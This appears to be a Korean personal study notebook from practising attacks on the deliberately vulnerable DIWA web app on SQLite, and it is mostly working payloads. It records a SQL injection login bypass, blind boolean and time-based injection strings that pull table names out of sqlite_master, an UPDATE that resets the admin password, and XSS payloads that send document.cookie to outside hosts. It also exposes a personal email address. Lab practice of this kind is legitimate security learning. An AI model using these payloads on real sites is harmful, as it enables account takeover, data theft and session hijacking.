개발환경 : SQLite, DIWA
(작성중)
sqlite3.exe chinook.db
' or 1=1 -- 로그인 인젝션 성공
유저, admin 개인정보 추출 및 비밀번호 변경 가능
error페이지에 sql query 노출 및 디렉토리 경로 노출
UPDATE diwa_users SET email = 'jsw4215van@gmail.com', country = 'Korea, Republic of', password = 'fd75163b67fd0934d70cb2801d70f21f' WHERE id = 1
time-based injection
DB유저명
insert into user_bbs values('12345','1','1','1','1');
select userpassword from user_bbs where userid='abc' and 1=1;
select user from dual;
' and (select case when ascii(substr(user,1,1))<100 then 1 else 1 end from dual)=1 --
select userpassword from user_bbs where userid='abc' or (select case when ascii(substr(user,1,1))<100 then 1 else 2 end from dual)=1 --
' or (select case when ascii(substr(user,1,1))<1000 then 1 else 2 end from dual)=1 --
' or (select case when ascii(substr(user,1,1))%3c1000 then 1 else 2 end from dual)=1 --
오라클이 아닌 것 같다
MySQL 연습
mysql -u root -p
show databases;
show tables;
select from users where first_name='' or (select substring(version(),1,1)<10)=1;
version() 찾을 수 없다는 오류
MySQL도 아닌가?
select from users where first_name='' or (select substring(DB_NAME(),1,1)<10)=1;
MSSQL아니고
select * from users where first_name='' or (select substr(sqlite_version(),1,1)<10)=1;
**Wrong Email or Password가 나오는걸로 봐서 sqlite가 의심된다.
SQLite
- SQLite에는 information_schema 가 없고 sqlite_master 라는게 있다.
데이터베이스 조회
SELECT를 사용한 데이터베이스 조회는 없는듯 하다.
데이터베이스 버전 조회
sqlite_version()
테이블 갯수
원래 쿼리
select count() from sqlite_master;
boolean 적용 쿼리
select count()<100 from sqlite_master;
사이트 적용
' or (select count(*)<100 from sqlite_master)=1 --
*테이블 갯수 : 5개
테이블 조회
SELECT tbl_name FROM sqlite_master;
SELECT name FROM sqlite_master;
name 이랑 tbl_name 이랑 같음
컬럼 조회
SELECT * FROM information_schema.SCHEMATA;SELECT sql FROM sqlite_master WHERE name='테이블명' AND sql LIKE '%컬럼명%'
sql에는 해당 테이블을 만들때 사용한 sql문이 저장되어 있다. (e.g CREATE TABLE 테이블명...)
select ascii(substr(sqlite_version(),1,1))<10;
ascii 함수가 먹히지 않음
select unicode(substr(sqlite_version(),1,1))<100;
unicode를 사용하면 됨
' or (select unicode(substr(sqlite_version(),1,1))<100)=1;
버전 확인함.
DB테이블명
select tbl_name from sqlite_master;
select tbl_name from sqlite_master limit 1;
select unicode(substr(tbl_name,1,1)) from sqlite_master limit 1;
select unicode(substr(tbl_name,1,1))<100 from sqlite_master limit 1;
(select unicode(substr(tbl_name,1,1))>100 from sqlite_master limit 1)=1;
예시 테스트
select email from customers where email='hughoreilly@apple.ie' or (select unicode(substr(tbl_name,1,1))<100 from sqlite_master limit 1)=1;
사이트 적용
' or (select unicode(substr(tbl_name,1,1))<1000 from sqlite_master limit 1)=1 --
*첫 테이블 명 : diwa_users
두번째 테이블명
select tbl_name from sqlite_master limit 1,1;
사이트 적용
'or (select unicode(substr(tbl_name,1,1))<100 from sqlite_master limit 1,1)=1 --
*두번재 테이블명 : sqlite_sequence
세번째 테이블명
select tbl_name from sqlite_master limit 2,1;
*세번째 테이블명: diwa_downloads
네번째 테이블명
select tbl_name from sqlite_master limit 3,1;
*네번째 테이블명 : diwa_threads
다섯번째 테이블명
select tbl_name from sqlite_master limit 4,1;
*다섯번째 테이블명 : diwa_posts
'or (select unicode(substr(tbl_name,1,1))<100 from sqlite_master limit 5,1)=1 --
DB테이블 컬럼 개수
기본 쿼리
select count(name)<10 from pragma_table_info('diwa');
사이트 적용
'or (select count(name)<100 from pragma_table_info('diwa'))=1 --
'or (select count()<10 from pragma_table_info('diwa_users'))=1 --
select count()=0 from pragma_table_info('diwa')
SELECT * FROM customers WHERE email = '' or select count(name)<100 from pragma_table_info('customers')
SELECT * FROM customers WHERE email = '' or (select count(name)<100 from pragma_table_info('customers'))=1;
DB테이블컬럼명
원래 쿼리
**SELECT name FROM PRAGMA_TABLE_INFO('customers') limit 1;
select unicode(substr(name,1,1))<100 from pragma_table_info('diwa') limit 1;
select c.name from pragma_table_info('customers') c limit 1;
' or 1=(select case when 1=1 then 1 else LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000000/2)))) end) and '1'='1
' or 1=(select case when 1=(SELECT unicode(substr(name,1,1))<100 from pragma_table_info('diwa_user') limit 1) then 1 else LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000000/2)))) end) and '1'='1
SELECT sql FROM sqlite_master WHERE tbl_name = 'customers' AND type = 'table'
SELECT count(sql) FROM sqlite_master WHERE tbl_name = 'customers' AND type = 'table'
사이트 적용
'or (select unicode(substr(name,1,1))<100 from pragma_table_info('diwa_users') limit 1)=1 --
'or ((select unicode(substr(c.name,1,1))<100 from pragma_table_info('diwa_users') c limit 1)=1) --
와 진짜 안됨..
- 단어로 조회하는 방법
SELECT sql FROM sqlite_master WHERE name='테이블이름' AND sql LIKE '%컬럼이름%'
SELECT sql FROM sqlite_master WHERE name='customers' AND sql LIKE '%a%'
select name from pragma_table_info('customers') where name like '%a%' limit 1;
select count(name) from pragma_table_info('customers') where name like '%a%';
' or (select count(name)<100 from pragma_table_info('diwa_users') where name like '%a%')=1 --
도저히 안됨 물어볼 것.
- python사용해서 시도해볼것
DB테이블 컬럼타입
XSS
Script_Tags are not allowed
<script>
<img src='0' onerror=alert("daniel")>
<svg onload=alert("XSS")>
<svg onload=alert("XSS")>
<svg window.open("http://192.168.0.51/cookie.php?data="+document.cookie,"small","width=50,heigtht=220, scrollbars=no,menubar=no")>
cookie
<script>window.open("http://192.168.0.51/cookie.php?data="+document.cookie,"small","width=50,heigtht=220, scrollbars=no,menubar=no")</script><iframe src="javascript:location='http://172.31.12.48/session/getsession.php?data='+document.cookie" width=0 height=0 frameborder=0></iframe><iframe src="javascript:location=\'http://192.168.0.51/cookie.php?data=\'+document.cookie" width=0 height=0 frameborder=0></iframe>안됨
<iframe src="javascript:location=%27http://192.168.0.51/cookie.php?data=%27+document.cookie" width=0 height=0 frameborder=0></iframe>성공
